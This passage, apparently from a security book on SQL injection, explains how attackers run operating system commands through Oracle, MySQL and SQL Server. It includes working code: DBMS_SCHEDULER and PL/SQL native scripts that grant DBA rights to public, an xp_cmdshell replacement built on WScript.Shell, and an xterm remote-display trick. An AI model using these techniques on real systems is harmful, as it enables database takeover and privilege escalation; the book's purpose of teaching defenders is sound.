SQL Server

SQL Injection Attacks and Defense : Executing Operating System Commands

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Executing commands through the database server serves multiple purposes. Other than the massive amount of fame and fortune that such activity attracts, command execution is normally searched for because of the high level of privileges with which most database servers run. A remote exploit against Apache will, at best, result in a shell with a user ID of nobody (probably within a jailed environment), but the equivalent attack against a DBMS will almost always yield high levels of permission. On Windows, this has traditionally been the System privilege.

Direct Execution

This section deals with executing operating system commands directly through SQL injection by exploiting functionality built into the RDBMS.


Oracle offers various documented and undocumented possibilities for running operating system commands. Most of these commands are available only if you have full access to the database (e.g., via SQL∗Plus) or via PL/SQL injection, but not via SQL injection.

Depending on the Oracle version, the following methods are available. Oracle EXTPROC, Java, and DBMS_SCHEDULER are official methods from Oracle to run operating system commands. For EXTPROC and Java, the following tool can be used to automate this process:


DBMS_SCHEDULER is new since Oracle 10g and requires CREATE JOB (10g Rel. 1) or CREATE EXTERNAL JOB (10g Rel. 2/11g) privileges. Since, the operating system commands are no longer executed as user Oracle, but as user nobody.

--Create a Program for dbms_scheduler
exec DBMS_SCHEDULER.create_program('RDS2009','EXECUTABLE', '
c:\WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
--Create, execute and delete a Job for dbms_scheduler
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2009JOB',program_name => '
RDS2009',start_date => NULL,repeat_interval => NULL,end_date =>
NULL,enabled => TRUE,auto_drop => TRUE);

PL/SQL Native

PL/SQL native in Oracle 10g/11g is undocumented, but in my experience it is the most reliable way to run operating system commands in Oracle 10g/11g because the commands are executed as user Oracle. There are no special requirements, as there are with Java and EXTPROC variations. The only requirement for PL/SQL native is the right to modify the SPNC_COMMANDS text file on the database server. Oracle will execute everything in this file if a procedure/function/package is created and PL/SQL native is enabled.

The following code grants DBA privileges to public by using PL/SQL native. The grant command is nothing other than an INSERT INTO SYSAUTH$ command which can normally be executed only as user SYS. In this example, we create a text file called e2.sql which is executed by sqlplus. This sqlplus command is started via PL/SQL native.

authid current_user as
pragma autonomous_transaction;
EXECUTE IMMEDIATE q'!create directory TX as 'C:\'!';
-- grant dba to public;
DBMS_ADVISOR.CREATE_FILE ( 'insert into sys.sysauth$
values(1,4,0,null);'||chr(13)||chr(10)||' exit;', 'TX', 'e2.sql' );
EXECUTE IMMEDIATE q'!drop directory TX!';
EXECUTE IMMEDIATE q'!create directory T as 'C:\ORACLE\ORA101\PLSQL'!';
v_file := utl_file.fopen('T','spnc_commands', 'w');
utl_file.put_line(v_file,'sqlplus / as sysdba @c:\e2.sql');
EXECUTE IMMEDIATE q'!drop directory T!';
EXECUTE IMMEDIATE q'!alter session set plsql_compiler_flags='NATIVE'!';
EXECUTE IMMEDIATE q'!alter system set plsql_native_library_dir='C:\'!';
EXECUTE IMMEDIATE q'!create or replace procedure h1 as begin null; end;!';

Other Possibilities

In addition to the methods above, it can also be possible to execute operating system code using other functionality within the database, including the following:

  • Alter system set events

  • PL/SQL native 9i

  • Buffer overflow + shell code

  • Custom code

Alter System Set Events

Alter system set is an undocumented parameter (since Oracle 10g) that allows you to specify the name of a custom debugger which will be executed during a debugging event, which would then need to be forced. For example:

alter system set "_oradbg_pathname"='/tmp/';

PL/SQL Native 9i

Since 9i Rel. 2, Oracle offers the possibility to convert PL/SQL code into C code. To increase the flexibility, Oracle allows you to change the name of the make utility (e.g., to calc.exe or any other executable). For example:

alter system set plsql_native_make_utility='cmd.exe /c echo Owned >
c:\rds.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end; /

Buffer Overflows

In 2004, Cesar Cerrudo published an exploit for a buffer overflow in the Oracle functions NUMTOYMINTERVAL and NUMTODSINTERVAL (see By using the following exploit, it was possible to run operating system commands on the database server:

chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE?
>c:\Unbreakable.txt') FROM DUAL;

Custom Application Code

In the Oracle world, it is not uncommon to use tables containing operating system commands. These commands will be executed by an external program connecting to the database. By updating such an entry in the database with the command of your choice, you can often overtake systems. It's always worth it to check all tables for columns containing operating system commands. For example:

| Id | Command | Description |
| 1 | sqlplus –s / as sysdba @report.sql | Run a report |
| 2 | rm /tmp/*.tmp | Daily cleanup |

By replacing rm /tmp/*.tmp with xterm –display, sooner or later a new xterm window with Oracle privileges will appear on the attacker's PC.


MySQL does not natively support the execution of shell commands. Most times the attacker hopes that the MySQL server and Web server reside on the same box, allowing him to use the “select into DUMPFILE” technique to build a rogue Common Gateway Interface (CGI) on the target machine. The “create UDF” attack detailed by NGS Software ( is excellent thinking, but it's not easy to do through an SQL injection attack (again because you cannot execute multiple queries separated by a command separator). Stacked queries are possible in MySQL 5 and later, but this has not been found in the wild very often (yet).

Microsoft SQL Server

Once more, we can find the lion's share of exploitation fun within Microsoft SQL Server. Attackers found the joy of xp_cmdshell ages ago and it certainly revived interest in how much can be done from the command line. xp_cmdshell has intuitive syntax, accepting a single parameter which is the command to be executed. The results of a simple ipconfig command appear in Figure 1.

Figure 1. xp_cmdshell under Microsoft SQL Server

On modern versions of SQL Server, however, xp_cmdshell is disabled by default. This (along with many other settings) can be configured through the Surface Area Configuration tool that ships with SQL Server. The Surface Area Configuration tool is shown in Figure 2.

Figure 2. The Surface Area Configuration Tool

This, however, poses little problem if the attacker has the necessary privileges, since it can once more be turned on through in-band signaling using the sp_configure statement.

Figure 3 demonstrates how to reenable xp_cmdshell within Query Manager. A quick search on the Internet for “xp_cmdshell alternative” will also quickly point you to the hordes of posts where people have rediscovered the possibility of instantiating a Wscript.Shell instance through T-SQL in much the same manner . The neatest of these, demonstrated in the code that follows, creates a new stored procedure called xp_cmdshell3.

Figure 3. Reenabling xp_cmdshell through an SQL Query

CREATE PROCEDURE xp_cmdshell3(@cmd varchar(255), @Wait int = 0) AS
--Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
--If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result

SQL Server 2005 and later also present a few new options for code execution, thanks once more to integration with the .NET CLR. This functionality, as mentioned earlier, is turned off by default but can be reenabled through a good SQL injection string and the right permissions.

We used the CREATE ASSEMBLY directives to get SQL Server to load a file from the system. If you want to use this functionality to load a valid .NET binary, you would once more have three options:

  • Create and load the executable locally:

    1. Create the source file on the system.

    2. Compile the source file to an executable.

    3. Call CREATE ASSEMBLY FOO from C:\temp\foo.dll.

  • Load the executable from a UNC share:

    1. Create the DLL (or EXE) on a publicly accessible Windows share.

    2. Call CREATE ASSEMBLY FOO from \\public_server\temp\foo.dll.

  • Create the executable from a passed string:

    1. Create an executable.

    2. Unpack the executable into HEX:"moo.dll","rb").read().unpack("H*")
  • Call CREATE ASSEMBLY MOO from 0x4d5a90000300000004000000ffff0.

The question that remains is what level of trust is given to these executables, considering the robust trust levels afforded through .NET. A full discussion of the .NET trust levels is beyond the scope of this book, but for completeness they are as follows:

  • SAFE:

    • Perform calculations

    • No access to external resources


    • Access to the disk

    • Access to the environment

    • Almost full access with some restrictions


    • Equivalent of full trust

    • Call unmanaged code

    • Do anything as SYSTEM

Our goal would obviously be to be able to load a binary as UNSAFE. To do this, however, requires that our binary be signed during development and that our key be trusted to the database. This would seem like too much of a mission to overcome through injection, but we are afforded a way out, since we can simply set the database to “Trustworthy” to bypass this limitation.

This allows us to create a .NET binary with no limitations and then import it into the system with permission set to UNSAFE (see Figure 4).

Figure 4. Creating an UNSAFE Binary by Making the Database “Trustworthy”
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